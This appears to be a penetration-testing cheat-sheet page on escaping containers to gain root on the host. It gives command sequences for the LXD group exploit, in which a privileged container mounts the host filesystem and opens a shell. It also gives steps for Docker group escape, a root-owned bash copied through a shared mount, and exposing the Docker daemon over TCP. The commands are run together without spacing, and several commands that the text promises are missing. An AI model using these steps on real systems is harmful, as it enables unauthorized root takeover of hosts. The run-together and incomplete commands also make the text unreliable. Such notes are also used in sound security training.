Container Escape
LXD Group Exploit
The lxd group members can manage the entire LXD daemon, which includes creating containers that interact with the host system.
git clone https://github.com/saghul/lxd-alpine-builderBuild the image
You need to match the architecture of the target machine
uname -m./build-alpine -a x86_64./build-alpine -a i686Transfer the file to the target machine
lxc image import <filename>.tar.gz --alias myimagelxc image listlxc init [myimage] [container_name] -c security.privileged=truelxc config device add [container_name] [device_name] disk source=/ path=/mnt/rootlxc start [container_name]lxc exec [container_name] /bin/shcd /mnt/rootEscape Docker
Tools like nsenter or docker-exploit can be used to attempt escaping the container.
If the user is in the docker group, attempt to run the following command to mount the host filesystem and gain access to the host:
File Ownership Manipulation via Shared Mounts
Check permissions and ownership when you create a file from host and container:
If the container is miss configured and can creates files as a
root, and you can access the files created by the host on the container:From the host, copybashin to the mounted directory.From the container, change the ownership and permissions ofbashtoroot.Execute
bashasroot.
Configure Docker to listen on a TCP port
Open the Docker service file, typically at
/lib/systemd/system/docker.serviceor/etc/systemd/system/docker.service.Change
ExecStartto bind aTCPaddress:
Reload the daemon and restart
Dockerif needed:
Connect to it using
docker-cli:
Last updated